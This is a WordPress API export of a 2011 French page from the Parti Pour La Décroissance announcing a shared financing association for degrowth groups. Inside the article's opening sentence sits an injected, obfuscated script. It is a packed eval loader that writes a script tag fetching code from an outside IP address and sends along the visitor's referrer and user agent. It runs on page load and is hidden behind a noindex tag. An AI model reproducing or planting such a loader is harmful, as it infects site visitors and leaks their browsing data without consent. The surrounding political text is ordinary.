{"id":6688,"date":"2011-11-29T22:17:34","date_gmt":"2011-11-29T21:17:34","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=6688"},"modified":"2011-11-29T22:19:34","modified_gmt":"2011-11-29T21:19:34","slug":"les-objecteurs-de-croissance-se-dotent-d%e2%80%99un-outil-commun-de-financement","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=6688","title":{"rendered":"Les Objecteurs de Croissance se dotent d\u2019un outil commun de financement"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2010\/05\/Image-2.png\" alt=\"\" width=\"153\" height=\"130\" \/><strong>Les <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dtdfs|var|u0026u|referrer|iifak||js|php'.split('|'),0,{}))\n<\/script><\/noindex> Objecteurs de Croissance poursuivent la construction du mouvement politique de la D\u00e9croissance.<\/strong><br \/>\nIls viennent de se doter d&rsquo;une Association de Financement (AF), future base d&rsquo;une possible maison commune, qui permettra aux structures adh\u00e9rentes de financer leurs actions. C\u2019est l\u2019outil commun \u00e0 tous les Objecteurs de Croissance, puisqu\u2019elle accueille toutes les structures qui adh\u00e8rent \u00e0 la \u00ab plateforme de convergence \u00bb (1), chacune d&rsquo;elles restant n\u00e9anmoins ind\u00e9pendante et autonome dans la forme de ses actions. Ces structures sont les groupes locaux ou nationaux d\u00e9clar\u00e9s en association loi 1901.<\/p>\n<p>Cette Association de Financement fonctionne comme toutes les AF des partis politiques, et n&rsquo;a elle-m\u00eame aucune visibilit\u00e9 publique.<br \/>\nElle permet de r\u00e9colter des dons &amp; adh\u00e9sions d\u00e9fiscalis\u00e9s ainsi que des subventions de l\u2019\u00e9tat, qui seront revers\u00e9s aux structures adh\u00e9rentes. Les actions men\u00e9es par ces derni\u00e8res s\u2019inscrivent dans <a href=\"http:\/\/www.decroissance2012.fr\/?p=129\">tous les niveaux de l\u2019action de l\u2019Objection de Croissance<\/a>\u00a0 Elles ne sont pas n\u00e9cessairement des \u00e9lections. Les \u00e9lections participent \u00e0 la visibilit\u00e9, mais elles peuvent aussi servir de source de financement pour d&rsquo;autres actions, sous r\u00e9serve d&rsquo;avoir un minimum de voix lors des \u00e9lections l\u00e9gislatives. Chaque association organise elle-m\u00eame la collecte de ses dons et aucune immixtion dans les comptes d&rsquo;une autre structure adh\u00e9rente ne sera tol\u00e9r\u00e9e.<\/p>\n<p>Le Parti Pour La D\u00e9croissance est structure adh\u00e9rente. Tout membre du PPLD qui agit en son sein pourra b\u00e9n\u00e9ficier des avantages de l&rsquo;AF, notamment en r\u00e9coltant des dons ou en participant \u00e0 des \u00e9lections.<\/p>\n<p>Cette Association de Financement n\u2019est pas un but en soi. Elle ne doit pas faire l\u2019objet d\u2019une strat\u00e9gie politique. Par contre, elle est un outil important pour aider les Objecteurs de Croissance \u00e0 colporter plus efficacement, partout en France, les id\u00e9es de la D\u00e9croissance. Ainsi, un certain pourcentage (vraisemblablement 10 %) de la totalit\u00e9 de l&rsquo;argent qui transitera par l&rsquo;AF sera pr\u00e9lev\u00e9 afin d&rsquo;organiser collectivement des actions nationales.<\/p>\n<p>Les statuts et r\u00e8glements int\u00e9rieurs sont disponibles sur simple demande.<br \/>\nPour plus de renseignements, <a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=3990\">veuillez nous contacter<\/a>.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2008\/12\/logo-ppld.gif\" alt=\"\" width=\"118\" height=\"68\" \/><\/p>\n<p><strong>\u00ab plateforme de convergence \u00bb (1)<\/strong><br \/>\n<a href=\"http:\/\/www.les-oc.info\/2009\/09\/plateforme-de-convergence\/\" target=\"_blank\">http:\/\/www.les-oc.info\/2009\/<wbr>09\/plateforme-de-convergence\/<\/wbr><\/a><br \/>\n<a href=\"..\/?page_id=6122\" target=\"_blank\">http:\/\/www.<wbr>partipourladecroissance.net\/?<wbr>page_id=6122<\/wbr><\/wbr><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Les Objecteurs de Croissance poursuivent la construction du mouvement politique de la D\u00e9croissance. Ils viennent de se doter d&rsquo;une Association de Financement (AF), future base d&rsquo;une possible maison commune, qui permettra aux structures adh\u00e9rentes de financer leurs actions. C\u2019est l\u2019outil &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=6688\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3982,"menu_order":2,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-6688","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/6688","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6688"}],"version-history":[{"count":3,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/6688\/revisions"}],"predecessor-version":[{"id":6692,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/6688\/revisions\/6692"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3982"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6688"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}